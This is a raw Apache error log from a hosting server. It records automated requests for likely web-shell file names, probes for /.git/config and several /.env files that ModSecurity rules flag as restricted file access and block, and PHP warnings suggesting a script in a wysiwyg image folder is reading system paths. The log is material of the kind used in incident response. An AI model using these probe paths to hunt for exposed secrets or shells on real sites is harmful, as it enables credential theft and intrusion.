[Mon May 11 17:59:48.759682 2026] [:error] [pid 1411055:tid 1411081] [client 106.228.56.235:62418] File does not exist: /home/pweilcom/public_html/images/dd.php, referer: http://www.pweil.com/images/dd.php
[Mon May 11 17:59:48.838475 2026] [:error] [pid 1411099:tid 1411120] [client 182.96.163.255:62454] File does not exist: /home/pweilcom/public_html/images/admin.php, referer: http://www.pweil.com/images/admin.php
[Mon May 11 17:59:48.879620 2026] [:error] [pid 1411099:tid 1411108] [client 106.5.168.122:62420] File does not exist: /home/pweilcom/public_html/images/admins.php, referer: http://www.pweil.com/images/admins.php
[Mon May 11 17:59:48.961497 2026] [:error] [pid 1412074:tid 1412098] [client 106.228.38.52:62470] File does not exist: /home/pweilcom/public_html/images/indexback.php, referer: http://www.pweil.com/images/indexback.php
[Mon May 11 17:59:48.962538 2026] [:error] [pid 1411055:tid 1411075] [client 182.96.163.4:62468] File does not exist: /home/pweilcom/public_html/images/1.php, referer: http://www.pweil.com/images/1.php
[Mon May 11 17:59:49.149288 2026] [:error] [pid 1424905:tid 1424915] [client 182.96.165.149:62435] File does not exist: /home/pweilcom/public_html/images/a.php, referer: http://www.pweil.com/images/a.php
[Mon May 11 17:59:49.714637 2026] [:error] [pid 1416109:tid 1416151] [client 59.62.67.198:21863] File does not exist: /home/pweilcom/public_html/images/logins.php, referer: http://www.pweil.com/images/logins.php
[Mon May 11 17:59:49.829319 2026] [:error] [pid 1411099:tid 1411108] [client 106.5.168.122:62420] File does not exist: /home/pweilcom/public_html/images/nginx.php, referer: http://www.pweil.com/images/nginx.php
[Mon May 11 17:59:50.104908 2026] [:error] [pid 1411055:tid 1411081] [client 106.228.56.235:62418] File does not exist: /home/pweilcom/public_html/images/newfile.php, referer: http://www.pweil.com/images/newfile.php
[Mon May 11 17:59:50.338256 2026] [:error] [pid 1411099:tid 1411108] [client 106.5.168.122:62420] File does not exist: /home/pweilcom/public_html/images/ak.php, referer: http://www.pweil.com/images/ak.php
[Mon May 11 17:59:50.490320 2026] [:error] [pid 1411055:tid 1411081] [client 106.228.56.235:62418] File does not exist: /home/pweilcom/public_html/images/system1.php, referer: http://www.pweil.com/images/system1.php
[Mon May 11 18:00:11.088898 2026] [ssl:error] [pid 1416109:tid 1416149] (EAI 2)Name or service not known: [client 18.159.231.78:28005] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:00:11.089088 2026] [ssl:error] [pid 1416109:tid 1416149] AH01941: stapling_renew_response: responder error
[Mon May 11 18:00:11.140591 2026] [ssl:error] [pid 1424905:tid 1424927] (EAI 2)Name or service not known: [client 18.159.199.77:9516] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:00:11.140634 2026] [ssl:error] [pid 1424905:tid 1424927] AH01941: stapling_renew_response: responder error
[Mon May 11 18:00:11.228816 2026] [ssl:error] [pid 1411099:tid 1411107] (EAI 2)Name or service not known: [client 18.158.189.225:59552] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:00:11.228861 2026] [ssl:error] [pid 1411099:tid 1411107] AH01941: stapling_renew_response: responder error
[Mon May 11 18:00:11.319671 2026] [ssl:error] [pid 1424905:tid 1424913] (EAI 2)Name or service not known: [client 18.159.93.15:2814] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:00:11.319701 2026] [ssl:error] [pid 1424905:tid 1424913] AH01941: stapling_renew_response: responder error
[Mon May 11 18:00:11.359358 2026] [ssl:error] [pid 1411055:tid 1411068] (EAI 2)Name or service not known: [client 18.159.199.77:52246] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:00:11.359390 2026] [ssl:error] [pid 1411055:tid 1411068] AH01941: stapling_renew_response: responder error
[Mon May 11 18:00:11.396443 2026] [ssl:error] [pid 1416109:tid 1416150] (EAI 2)Name or service not known: [client 3.127.31.193:13819] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:00:11.396468 2026] [ssl:error] [pid 1416109:tid 1416150] AH01941: stapling_renew_response: responder error
[Mon May 11 18:00:11.468288 2026] [ssl:error] [pid 1411201:tid 1411261] (EAI 2)Name or service not known: [client 18.159.93.15:36002] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:00:11.468324 2026] [ssl:error] [pid 1411201:tid 1411261] AH01941: stapling_renew_response: responder error
[Mon May 11 18:00:11.555555 2026] [ssl:error] [pid 1412074:tid 1412099] (EAI 2)Name or service not known: [client 18.157.252.152:4910] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:00:11.555593 2026] [ssl:error] [pid 1412074:tid 1412099] AH01941: stapling_renew_response: responder error
[Mon May 11 18:00:21.511912 2026] [ssl:error] [pid 1412074:tid 1412086] (EAI 2)Name or service not known: [client 216.157.42.70:13947] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:00:21.511946 2026] [ssl:error] [pid 1412074:tid 1412086] AH01941: stapling_renew_response: responder error
[Mon May 11 18:00:23.049982 2026] [ssl:error] [pid 1416109:tid 1416135] (EAI 2)Name or service not known: [client 216.157.42.95:3735] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:00:23.050017 2026] [ssl:error] [pid 1416109:tid 1416135] AH01941: stapling_renew_response: responder error
[Mon May 11 18:00:24.088904 2026] [ssl:error] [pid 1424905:tid 1424914] (EAI 2)Name or service not known: [client 216.157.42.75:6067] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:00:24.088933 2026] [ssl:error] [pid 1424905:tid 1424914] AH01941: stapling_renew_response: responder error
[Mon May 11 18:00:25.130674 2026] [ssl:error] [pid 1416109:tid 1416152] (EAI 2)Name or service not known: [client 216.157.42.89:17857] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:00:25.130701 2026] [ssl:error] [pid 1416109:tid 1416152] AH01941: stapling_renew_response: responder error
[Mon May 11 18:00:25.665907 2026] [ssl:error] [pid 1411099:tid 1411113] (EAI 2)Name or service not known: [client 216.157.42.83:35568] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:00:25.665945 2026] [ssl:error] [pid 1411099:tid 1411113] AH01941: stapling_renew_response: responder error
[Mon May 11 18:00:26.200330 2026] [ssl:error] [pid 1411055:tid 1411060] (EAI 2)Name or service not known: [client 216.157.42.89:17120] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:00:26.200368 2026] [ssl:error] [pid 1411055:tid 1411060] AH01941: stapling_renew_response: responder error
[Mon May 11 18:00:27.250752 2026] [ssl:error] [pid 1411099:tid 1411101] (EAI 2)Name or service not known: [client 216.157.42.89:42807] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:00:27.250804 2026] [ssl:error] [pid 1411099:tid 1411101] AH01941: stapling_renew_response: responder error
[Mon May 11 18:00:27.959690 2026] [security2:error] [pid 1416109:tid 1416149] [client 43.159.139.164:52294] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agH9G1V4kyjgo4bQBUh3AQAAANM"]
[Mon May 11 18:00:28.341151 2026] [ssl:error] [pid 1424905:tid 1424932] (EAI 2)Name or service not known: [client 216.157.42.75:44272] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:00:28.341213 2026] [ssl:error] [pid 1424905:tid 1424932] AH01941: stapling_renew_response: responder error
[Mon May 11 18:01:27.906595 2026] [core:error] [pid 1411099:tid 1411119] [client 51.159.210.94:39140] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:01:27.906880 2026] [core:error] [pid 1411099:tid 1411119] [client 51.159.210.94:39140] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Mon May 11 18:01:53.643528 2026] [security2:error] [pid 1416109:tid 1416135] [client 43.159.139.164:49332] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "bender.piregwan-genesis.com"] [uri "/"] [unique_id "agH9cVV4kyjgo4bQBUh3aAAAAMU"], referer: http://bender.piregwan-genesis.com
PHP Warning:  filesize(): stat failed for /usr/lib/.build-id/00/ac4539aeb462508c811e4e9b589d476b7b8f3d in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /usr/lib/.build-id/00/ac4539aeb462508c811e4e9b589d476b7b8f3d in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Mon May 11 18:02:28.941959 2026] [ssl:error] [pid 1424905:tid 1424927] (EAI 2)Name or service not known: [client 216.157.41.93:42869] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:02:28.942019 2026] [ssl:error] [pid 1424905:tid 1424927] AH01941: stapling_renew_response: responder error
[Mon May 11 18:02:29.462925 2026] [ssl:error] [pid 1411099:tid 1411111] (EAI 2)Name or service not known: [client 216.157.41.88:60806] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:02:29.462970 2026] [ssl:error] [pid 1411099:tid 1411111] AH01941: stapling_renew_response: responder error
[Mon May 11 18:02:30.137567 2026] [ssl:error] [pid 1411099:tid 1411101] (EAI 2)Name or service not known: [client 216.157.41.89:32648] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:02:30.137595 2026] [ssl:error] [pid 1411099:tid 1411101] AH01941: stapling_renew_response: responder error
[Mon May 11 18:02:30.572330 2026] [ssl:error] [pid 1411055:tid 1411063] (EAI 2)Name or service not known: [client 216.157.41.71:58257] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:02:30.572365 2026] [ssl:error] [pid 1411055:tid 1411063] AH01941: stapling_renew_response: responder error
[Mon May 11 18:02:31.076348 2026] [ssl:error] [pid 1411201:tid 1411268] (EAI 2)Name or service not known: [client 216.157.41.89:7573] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:02:31.076394 2026] [ssl:error] [pid 1411201:tid 1411268] AH01941: stapling_renew_response: responder error
[Mon May 11 18:02:31.291414 2026] [ssl:error] [pid 1411055:tid 1411076] (EAI 2)Name or service not known: [client 216.157.41.80:42117] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:02:31.291442 2026] [ssl:error] [pid 1411055:tid 1411076] AH01941: stapling_renew_response: responder error
[Mon May 11 18:02:31.898761 2026] [ssl:error] [pid 1411055:tid 1411068] (EAI 2)Name or service not known: [client 216.157.41.94:25166] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:02:31.898800 2026] [ssl:error] [pid 1411055:tid 1411068] AH01941: stapling_renew_response: responder error
[Mon May 11 18:02:32.332473 2026] [ssl:error] [pid 1412074:tid 1412091] (EAI 2)Name or service not known: [client 216.157.41.80:44140] AH01972: could not resolve address of OCSP responder r11.o.lencr.org
[Mon May 11 18:02:32.332521 2026] [ssl:error] [pid 1412074:tid 1412091] AH01941: stapling_renew_response: responder error
[Mon May 11 18:02:59.650815 2026] [autoindex:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Mon May 11 18:03:00.378370 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.git/config"] [unique_id "agH9tEWKUxpmnkK7zHyhWwAAAQQ"]
[Mon May 11 18:03:00.378951 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.git/config"] [unique_id "agH9tEWKUxpmnkK7zHyhWwAAAQQ"]
[Mon May 11 18:03:00.379762 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9tEWKUxpmnkK7zHyhWwAAAQQ"]
[Mon May 11 18:03:00.842202 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agH9tEWKUxpmnkK7zHyhXgAAAQQ"]
[Mon May 11 18:03:00.842421 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env"] [unique_id "agH9tEWKUxpmnkK7zHyhXgAAAQQ"]
[Mon May 11 18:03:00.842701 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9tEWKUxpmnkK7zHyhXgAAAQQ"]
[Mon May 11 18:03:01.016500 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.local"] [unique_id "agH9tUWKUxpmnkK7zHyhYAAAAQQ"]
[Mon May 11 18:03:01.016724 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.local"] [unique_id "agH9tUWKUxpmnkK7zHyhYAAAAQQ"]
[Mon May 11 18:03:01.017013 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9tUWKUxpmnkK7zHyhYAAAAQQ"]
[Mon May 11 18:03:01.194179 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.production"] [unique_id "agH9tUWKUxpmnkK7zHyhYQAAAQQ"]
[Mon May 11 18:03:01.194406 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.production"] [unique_id "agH9tUWKUxpmnkK7zHyhYQAAAQQ"]
[Mon May 11 18:03:01.194737 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9tUWKUxpmnkK7zHyhYQAAAQQ"]
[Mon May 11 18:03:01.375947 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.staging"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.staging"] [unique_id "agH9tUWKUxpmnkK7zHyhYgAAAQQ"]
[Mon May 11 18:03:01.376182 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.staging"] [unique_id "agH9tUWKUxpmnkK7zHyhYgAAAQQ"]
[Mon May 11 18:03:01.376476 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9tUWKUxpmnkK7zHyhYgAAAQQ"]
[Mon May 11 18:03:01.538797 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.development"] [unique_id "agH9tUWKUxpmnkK7zHyhYwAAAQQ"]
[Mon May 11 18:03:01.539015 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.development"] [unique_id "agH9tUWKUxpmnkK7zHyhYwAAAQQ"]
[Mon May 11 18:03:01.539298 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9tUWKUxpmnkK7zHyhYwAAAQQ"]
[Mon May 11 18:03:01.707400 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.test"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.test"] [unique_id "agH9tUWKUxpmnkK7zHyhZAAAAQQ"]
[Mon May 11 18:03:01.707627 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.test"] [unique_id "agH9tUWKUxpmnkK7zHyhZAAAAQQ"]
[Mon May 11 18:03:01.707897 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agH9tUWKUxpmnkK7zHyhZAAAAQQ"]
[Mon May 11 18:03:01.876942 2026] [security2:error] [pid 1411055:tid 1411061] [client 54.67.78.1:42030] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.remote"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.remote"] [unique_id "agH9tUWKUxpmnkK7zHyhZgAAAQQ"]
